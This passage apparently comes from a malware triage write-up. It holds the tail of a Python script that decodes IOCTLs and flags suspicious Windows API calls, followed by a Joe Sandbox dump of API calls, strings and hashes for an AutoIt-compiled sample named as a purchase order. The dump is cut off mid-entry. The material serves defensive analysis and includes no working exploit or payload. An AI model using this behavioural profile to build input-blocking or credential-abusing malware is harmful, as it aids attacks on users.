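            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            current.append({"name": m.group("name"), "module": m.group("module"),
                            "args": args, "ref": m.group("ref")})
    return [g for g in groups if g]


def analyse_group(calls):
    """Decode IOCTLs and flag one function's calls (heuristic flag names)."""
    names = {c["name"] for c in calls}
    flags, ioctls = [], []
    for c in calls:
        if c["name"] == "DeviceIoControl" and len(c["args"]) > 1:
            code = hex_arg(c["args"][1])           # dwIoControlCode is the 2nd argument
            if code is not None:
                ioctls.append(decode_ioctl(code))
        if c["name"] == "BlockInput" and c["args"] and hex_arg(c["args"][0]) == 1:
            flags.append("blocks-user-input")      # BlockInput(TRUE)
    if names & {"SendInput", "keybd_event", "mouse_event"}:
        flags.append("synthesises-user-input")
    if "AdjustTokenPrivileges" in names:
        flags.append("adjusts-token-privileges")
    if names & {"LogonUserW", "LogonUserA"}:
        flags.append("logon-with-credentials")
    if ioctls:
        flags.append("device-ioctl")
    return {"ref": calls[0]["ref"], "apis": sorted(names), "ioctls": ioctls, "flags": flags}


def triage(text):
    return [analyse_group(g) for g in parse_listing(text)]


if __name__ == "__main__":
    for r in triage(SAMPLE_LISTING):
        print(f"{r['ref']}: {', '.join(r['apis'])} -> {', '.join(r['flags']) or '-'}")
        for io in r["ioctls"]:
            print(f"    0x{io['code']:08X} = {io['name']} ({io['device_name']}, "
                  f"function 0x{io['function']:X}, {io['method']}, {io['access']})")
```

                      Running the script on the excerpt decodes 0x002D1400 as IOCTL_STORAGE_QUERY_PROPERTY on FILE_DEVICE_MASS_STORAGE, which, together with the 12-byte input buffer (the size of a STORAGE_PROPERTY_QUERY), is consistent with a storage-property query; whether the sample uses the result for anything is not established by the listing alone. The KNOWN_IOCTLS table is deliberately short; extend it from the SDK headers as needed.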
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: NameUser
                      • String ID:
                      • API String ID: 2645101109-0
                      • Opcode ID: 9fa710fe7d025bde14b4c459a55ac2628196f2902ba0d42336b0bd851ca3d75d
                      • Instruction ID: 87dfa2463cdca0e7c2ec34415b72bb7120d73d1e56b962faad02162a9b664262
                      • Opcode Fuzzy Hash: 9fa710fe7d025bde14b4c459a55ac2628196f2902ba0d42336b0bd851ca3d75d
                      • Instruction Fuzzy Hash: 15C04CB140400DDFC715CB80C989DEFB7BCBB08300F104095A115E2040DB709B459B71
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00AB8E1F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: 3e27e88905a2393eb9ec4096fd91c93afe6810c1a521af9cc91dc54a50c41df6
                      • Instruction ID: 13f71073e4ea7e2e3f1ceaa3f620c2e4bcd29c809b0b408e686cb78b51cca6fb
                      • Opcode Fuzzy Hash: 3e27e88905a2393eb9ec4096fd91c93afe6810c1a521af9cc91dc54a50c41df6
                      • Instruction Fuzzy Hash: 4BA0123000050CA78A001B51FC044847F6CD7041507408010F41C01021CB3354104585
                      APIs
                      • GetProcessHeap.KERNEL32(00AB6AE9,00B467D8,00000014), ref: 00ABA937
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: HeapProcess
                      • String ID:
                      • API String ID: 54951025-0
                      • Opcode ID: cf4aaa9ff2071ebacdb6ef3805598f9ceefcf21614f97d20890965d8d7f8e10f
                      • Instruction ID: 5b536f11215bb9542e2cdb5f415b0246551fd94a314fb2a4c07a4eec43c1329f
                      • Opcode Fuzzy Hash: cf4aaa9ff2071ebacdb6ef3805598f9ceefcf21614f97d20890965d8d7f8e10f
                      • Instruction Fuzzy Hash: 0DB012F07032034BD7084B3CAC5429E39D45789202341807D7403C3560DF308420DF00
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                      • Instruction ID: 422c92e37a84fd0bd7deeea60af2656a1df043facff242247779199923cc39da
                      • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                      • Instruction Fuzzy Hash: 16C1C27220529349DF2D473EC4348BFBEA95AA27F131A0B6DD4B3CB4C6EE24D564D620
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                      • Instruction ID: 57c9843a5601d4003124a0c714c95ce547aa97613b7c8f12504ec73d9915d870
                      • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                      • Instruction Fuzzy Hash: 6DC1C3722052934ADF2D4739C4348BFBFA95AA27B131A476DD8B3CB4C6FE24D524D620
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                      • Instruction ID: 321bdefa8d69cb18231f7c36d33f3eef4872f4d040a2632cbff053298a6f738a
                      • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                      • Instruction Fuzzy Hash: BFC1B17220529349DF2D473984348BFBFA95AA27F531A4B6DD4B3CB4C2EE24D524D620
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                      • Instruction ID: 161bb9a8234e8b02c13c3217c585bea901b04d7b018ca4cb88b7f9c96a5b7127
                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                      • Instruction Fuzzy Hash: D1C1D27220529349DF2D473984348BFFFA95EA27B131A4B6DD4B3CB4C2EE24D564C660
                      APIs
                      • DeleteObject.GDI32(00000000), ref: 00AEA7A5
                      • DeleteObject.GDI32(00000000), ref: 00AEA7B7
                      • DestroyWindow.USER32 ref: 00AEA7C5
                      • GetDesktopWindow.USER32 ref: 00AEA7DF
                      • GetWindowRect.USER32(00000000), ref: 00AEA7E6
                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00AEA927
                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00AEA937
                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEA97F
                      • GetClientRect.USER32(00000000,?), ref: 00AEA98B
                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00AEA9C5
                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEA9E7
                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEA9FA
                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAA05
                      • GlobalLock.KERNEL32(00000000), ref: 00AEAA0E
                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAA1D
                      • GlobalUnlock.KERNEL32(00000000), ref: 00AEAA26
                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAA2D
                      • GlobalFree.KERNEL32(00000000), ref: 00AEAA38
                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAA4A
                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00B1D9BC,00000000), ref: 00AEAA60
                      • GlobalFree.KERNEL32(00000000), ref: 00AEAA70
                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00AEAA96
                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00AEAAB5
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAAD7
                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEACC4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                      • String ID: $AutoIt v3$DISPLAY$static
                      • API String ID: 2211948467-2373415609
                      • Opcode ID: 5e403b6aa7440d71c0c3f794ec388c4c512adda640f42573a1be2c374f4e1ebb
                      • Instruction ID: b91cc3d18dbd3ee4cac60cb7cb84185954c7f2b18228e246bbd3e2a4069d16f8
                      • Opcode Fuzzy Hash: 5e403b6aa7440d71c0c3f794ec388c4c512adda640f42573a1be2c374f4e1ebb
                      • Instruction Fuzzy Hash: 6302AD71A00254EFDB14DFA9CD89EAE7BB9FF48310F148559F905AB2A1DB30AD41CB60
                      APIs
                      • SetTextColor.GDI32(?,00000000), ref: 00AFD0EB
                      • GetSysColorBrush.USER32(0000000F), ref: 00AFD11C
                      • GetSysColor.USER32(0000000F), ref: 00AFD128
                      • SetBkColor.GDI32(?,000000FF), ref: 00AFD142
                      • SelectObject.GDI32(?,00000000), ref: 00AFD151
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00AFD17C
                      • GetSysColor.USER32(00000010), ref: 00AFD184
                      • CreateSolidBrush.GDI32(00000000), ref: 00AFD18B
                      • FrameRect.USER32(?,?,00000000), ref: 00AFD19A
                      • DeleteObject.GDI32(00000000), ref: 00AFD1A1
                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00AFD1EC
                      • FillRect.USER32(?,?,00000000), ref: 00AFD21E
                      • GetWindowLongW.USER32(?,000000F0), ref: 00AFD249
                        • Part of subcall function 00AFD385: GetSysColor.USER32(00000012), ref: 00AFD3BE
                        • Part of subcall function 00AFD385: SetTextColor.GDI32(?,?), ref: 00AFD3C2
                        • Part of subcall function 00AFD385: GetSysColorBrush.USER32(0000000F), ref: 00AFD3D8
                        • Part of subcall function 00AFD385: GetSysColor.USER32(0000000F), ref: 00AFD3E3
                        • Part of subcall function 00AFD385: GetSysColor.USER32(00000011), ref: 00AFD400
                        • Part of subcall function 00AFD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AFD40E
                        • Part of subcall function 00AFD385: SelectObject.GDI32(?,00000000), ref: 00AFD41F
                        • Part of subcall function 00AFD385: SetBkColor.GDI32(?,00000000), ref: 00AFD428
                        • Part of subcall function 00AFD385: SelectObject.GDI32(?,?), ref: 00AFD435
                        • Part of subcall function 00AFD385: InflateRect.USER32(?,000000FF,000000FF), ref: 00AFD454
                        • Part of subcall function 00AFD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AFD46B
                        • Part of subcall function 00AFD385: GetWindowLongW.USER32(00000000,000000F0), ref: 00AFD480
                        • Part of subcall function 00AFD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AFD4A8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                      • String ID:
                      • API String ID: 3521893082-0
                      • Opcode ID: ed28b4e17951ccfd61cfd6e9c74bb8bf920c8117c1ef1f47f59ebae02f5bccac
                      • Instruction ID: 43981bdc3efab0ab6491cb012e8db46238192b20cf5fceadac71b84b53072913
                      • Opcode Fuzzy Hash: ed28b4e17951ccfd61cfd6e9c74bb8bf920c8117c1ef1f47f59ebae02f5bccac
                      • Instruction Fuzzy Hash: 2A918072008305BFC7119F64DC08EAB7BAAFF89320F504A19FA62A71E0DB75D944CB52
                      APIs
                      • DestroyWindow.USER32 ref: 00A94956
                      • DeleteObject.GDI32(00000000), ref: 00A94998
                      • DeleteObject.GDI32(00000000), ref: 00A949A3
                      • DestroyIcon.USER32(00000000), ref: 00A949AE
                      • DestroyWindow.USER32(00000000), ref: 00A949B9
                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B0E179
                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B0E1B2
                      • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00B0E5E0
                        • Part of subcall function 00A949CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A94954,00000000), ref: 00A94A23
                      • SendMessageW.USER32 ref: 00B0E627
                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B0E63E
                      • ImageList_Destroy.COMCTL32(00000000), ref: 00B0E654
                      • ImageList_Destroy.COMCTL32(00000000), ref: 00B0E65F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                      • String ID: 0
                      • API String ID: 464785882-4108050209
                      • Opcode ID: b470d1b4fce7b52af6a4ca35b01b8c3f7cb278cea8a82eeb87f9486b812ffeb0
                      • Instruction ID: 3fc1a4552afdd381dc3c70f51ce26b04ad19cd12aaa3f6d34fd95b77971ee4ad
                      • Opcode Fuzzy Hash: b470d1b4fce7b52af6a4ca35b01b8c3f7cb278cea8a82eeb87f9486b812ffeb0
                      • Instruction Fuzzy Hash: 62128030604201DFDB25CF14C984BAABBE5FF59304F5449A9F9A9DB2A2C731EC46CB91
                      APIs
                      • DestroyWindow.USER32(00000000), ref: 00AEA42A
                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00AEA4E9
                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00AEA527
                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00AEA539
                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00AEA57F
                      • GetClientRect.USER32(00000000,?), ref: 00AEA58B
                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00AEA5CF
                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AEA5DE
                      • GetStockObject.GDI32(00000011), ref: 00AEA5EE
                      • SelectObject.GDI32(00000000,00000000), ref: 00AEA5F2
                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00AEA602
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AEA60B
                      • DeleteDC.GDI32(00000000), ref: 00AEA614
                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AEA642
                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00AEA659
                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00AEA694
                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00AEA6A8
                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00AEA6B9
                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00AEA6E9
                      • GetStockObject.GDI32(00000011), ref: 00AEA6F4
                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00AEA6FF
                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00AEA709
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                      • API String ID: 2910397461-517079104
                      • Opcode ID: 34d8a581de65cfaea2ef76a0a4673b4a4e78f3fb1e0f796fbf009326cd185273
                      • Instruction ID: 0bb073e0745a0ebc1031e239ce3d6e92ed1449a3ec959fb1425170b5021cd54c
                      • Opcode Fuzzy Hash: 34d8a581de65cfaea2ef76a0a4673b4a4e78f3fb1e0f796fbf009326cd185273
                      • Instruction Fuzzy Hash: 7FA17071A00215BFEB14DBA9DD4AFAE7BB9EB44711F008555F614EB2E0DBB0AD40CB60
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00ADE45E
                      • GetDriveTypeW.KERNEL32(?,00B2DC88,?,\\.\,00B2DBF0), ref: 00ADE54B
                      • SetErrorMode.KERNEL32(00000000,00B2DC88,?,\\.\,00B2DBF0), ref: 00ADE6B1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorMode$DriveType
                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                      • API String ID: 2907320926-4222207086
                      • Opcode ID: e584f982e32acc97f86fb0ab77de6751f2ec1eda827c4a134a224416ad5c8100
                      • Instruction ID: 25d41faca3a50b036e1525b635323de7b8afa6a4ca38cede801ac73139356fd6
                      • Opcode Fuzzy Hash: e584f982e32acc97f86fb0ab77de6751f2ec1eda827c4a134a224416ad5c8100
                      • Instruction Fuzzy Hash: 9651B330208341ABC600FF14C9D1969B7F1EBA4B44B64895BF447AF3E2DB60DF45EA42
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                      • API String ID: 1038674560-86951937
                      • Opcode ID: e1794ba5c8d24d92c65fc1548913bc52465ad79ae1a84e3accc6835f1e6e85ff
                      • Instruction ID: 64252625bfc45a6d79bc1907b212cc2475de204a495fc6a5f3ae00d06746d538
                      • Opcode Fuzzy Hash: e1794ba5c8d24d92c65fc1548913bc52465ad79ae1a84e3accc6835f1e6e85ff
                      • Instruction Fuzzy Hash: D7613631740B217BDF21EB64AD82FBA33ECAF15750F144065F846AA5D7EBA0DA01C7A1
                      APIs
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00AFC598
                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00AFC64E
                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 00AFC669
                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00AFC925
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$Window
                      • String ID: 0
                      • API String ID: 2326795674-4108050209
                      • Opcode ID: 18609db876b0038a9d3356e8a21f61a523fc842ac616cab19169fe16253c1927
                      • Instruction ID: 8162d441dad675f82b40abd5c19ace9c93693767cba471fd027f812c2f10f195
